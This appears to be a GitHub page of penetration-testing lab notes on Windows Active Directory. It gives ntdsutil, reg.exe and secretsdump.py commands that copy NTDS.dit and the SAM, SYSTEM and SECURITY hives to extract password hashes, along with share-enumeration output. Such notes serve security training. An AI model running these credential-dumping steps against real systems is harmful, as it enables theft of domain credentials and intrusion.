You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Enter VULNNET-RST.LOCAL\t-skid's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Mar 17 00:15:49 2021
.. D 0 Wed Mar 17 00:15:49 2021
ResetPassword.vbs A 2821 Wed Mar 17 00:18:14 2021
8540159 blocks of size 4096. 4318542 blocks available
smb: \> get ResetPassword.vbs -
Dump hashes
Use secretsdump.py with impacket
This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer.
Creds used need to be domain admin for this to work
Run ntdsutil from the command prompt, enter these commands
snapshot
activate instance NTDS
create
Takes a snapshot of the DC
Will show you the UUID of the newly created snapshot.
ntdsutil is using Volume Shadow Copy for the snapshot creation, but also ensures the database consistency. Use the UUID for the following command:
mount <UUID>
The output will show the path where the snapshot was mounted. Start another cmd.exe as Administrator and copy NTDS.dit (located in Windows\NTDS\NTDS.dit by default).
Create a copy of the SYSTEM registry hive:
reg.exe save HKLM\SYSTEM <path_where_you_want_to_save_it>
Go back to the cmd.exe window with ntdsutil running, and unmount (and optionally delete) the snapshot and exit:
unmount <UUID>
delete <UUID>
quit
quit
Using the two saved files (NTDS.dit and SYSTEM registry hive) you can use the same secretsdump.py script to extract password hashes offline (doesn’t need to be done on the domain controller):
secretsdump.py -system <path_to_system_hive> -ntds <path_to_ntds.dit> LOCAL
Secretsdump Local
Exfil the registry hives
reg.exe save hklm\security C:\temp\security.save
reg.exe save hklm\system C:\temp\system.save
reg.exe save hklm\SAM C:\temp\sam.save
Extract hashes from exfiled SECURITY SAM and SYSTEM
python3 secretsdump.py -security security.save -system system.save -sam sam.save LOCAL
Invoke-ShareFinder -Verbose
VERBOSE: [*] Running Invoke-ShareFinder with delay of 0
VERBOSE: [*] Querying domain rastalabs.local for hosts
VERBOSE: Get-DomainSearcher search string: LDAP://dc01.rastalabs.local/DC=rastalabs,DC=local
VERBOSE: Get-NetComputer filter : '(&(sAMAccountType=805306369)(dnshostname=*))'
VERBOSE: [*] Total number of hosts: 12
VERBOSE: Waiting for scanning threads to finish...
VERBOSE: All threads completed!
VERBOSE: [*] Total number of active hosts: 12
VERBOSE: [*] Enumerating server dc01.rastalabs.local (1 of 12)
\\dc01.rastalabs.local\ADMIN$ - Remote Admin
\\dc01.rastalabs.local\C$ - Default share
\\dc01.rastalabs.local\IPC$ - Remote IPC
\\dc01.rastalabs.local\NETLOGON - Logon server share
--snip--